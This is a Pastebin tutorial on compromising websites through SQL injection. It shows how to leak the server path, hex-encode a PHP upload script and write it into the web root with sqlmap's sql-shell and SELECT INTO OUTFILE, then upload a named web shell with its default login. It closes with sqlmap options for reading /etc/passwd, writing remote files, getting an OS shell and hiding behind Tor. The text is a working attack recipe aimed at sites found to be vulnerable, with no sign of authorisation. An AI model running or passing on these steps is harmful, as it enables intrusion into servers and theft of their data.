API tools faq
paste
Advertisement
Kyfx

Sqlmap shell hacking Tutorials with sqlmap commands :)

Kyfx
Apr 16th, 2015
1,912
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.37 KB | None | 0 0
raw download clone embed print report
  1. what you need:?
  2. A PHP Shell^
  3. A upload script^ (optional might work without)
  4. sqlmap^ (optional but makes it so much easier)
  5.  
  6. what is a shell?
  7. Quote
  8. Shell is a shell wrapped in a script. It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree a SSH connection.
  9.  
  10. You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc can be used.
  11.  
  12. There are some limitations on what kind of programs you can run. It won't do no good if you start a graphical program like Firefox or even a console based one like vi. All programs have to be strictly command line programs, and they will have no chance of getting user input after they have been launched.They probably also have to terminate within 30 seconds, as this is the default time-limit imposed unto all PHP scripts, to prevent them from running in an infinite loop. Your ISP may have set this time-limit to something else.
  13.  
  14. But you can rely on all the normal shell-functionality, like pipes, output and input redirection, etc
  15. source^
  16.  
  17. so lets start :)
  18.  
  19. 1. After finding a vulnerable site you need to get Full Path Disclosure^
  20. I will use the empty array exploit, add the brackets []
  21. Code: [Select]
  22. http://www.example.com/index.php?id[]=1
  23. gives
  24. Code: [Select]
  25. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/relax/public_html/index.php on line 59
  26. now we have the path
  27.  
  28. 2. now you need to convert your upload script to hex^
  29. Code: [Select]
  30. <form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>
  31. becomes
  32. Code: [Select]
  33. 3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
  34.  
  35. 3. Now lets fire up sqlmap with a sql-shell and inject
  36. Code: [Select]
  37. python sqlmap.py --url=http://www.example.com/index.php?id=1 --sql-shell
  38. let sqlmap do its magic and after a while you will get a sql-shell
  39. Quote
  40. [15:35:06] [INFO] the back-end DBMS is MySQL
  41. web server operating system: Windows
  42. web application technology: PHP 5.3.5, Apache 2.2.17
  43. back-end DBMS: MySQL 5
  44. [15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
  45. sql-shell>
  46. now write
  47. SELECT 0xYour_Hex_Code INTO OUTFILE "Full_Path+filename";
  48. don't forget the 0x before your hex, so it soul look like
  49. Code: [Select]
  50. select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
  51. into "/home/relax/public_html/upload.php";
  52. After a few seconds you should get a confirmation if it was successful or not
  53.  
  54. 4. browse to http://www.example.com/upload.php and upload the php shell
  55.  
  56. 5. browse to your php shell and login
  57.  
  58.  
  59. Info:
  60. The username and password for the shell is cyber, gladiator, you can change this in the php file, this specific shell must be named cyb3r-sh3ll.php or it will not work
  61.  
  62. Think about having a unique name for your upload file so you don't overwrite some existing file, if you change name you also need to change the source.
  63.  
  64. Extra:
  65. You don't need to use sqlmap you can simply run the select statement in your browser it requires a bit more work tho.
  66.  
  67. A theory is that you can inject the full shellcode directly instead of first writing the uploader, the problems is that this specific shell is 268kB but maybe with a smaller shell
  68.  
  69. sqlmap is really powerful tool you can do shitt load of stuff with it here are some functions i find helpfull:
  70.  
  71. -o optimization
  72. --threads=1-10 nr of threads (faster)
  73. --dbms=mysql backend dbms (faster)
  74. --level=1-5 more-tests
  75. --risk=1-3 more-tests
  76. --tor-port=xxxx connect through tor
  77. --random-agent random user agent
  78. --file-read=/etc/passwd read local file
  79. --file-write=/etc/passwd write file to remote machine must be used with file-dest
  80. --file-dest=/etc/passwd where to write the file-write
  81. --os-shell like the sql-shell but system
  82. --wizard for beginners
  83. --check-waf Check for WAF/IPS/IDS protection
  84.  
  85. there are many more just check them out
  86.  
  87. The --file-read/write does not work most of the times maybe im doing something wrong thats why i use sql-shell to write files or do specific commands.
  88.  
  89. --os-shell is awesome, you cant write php code to disk tho.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!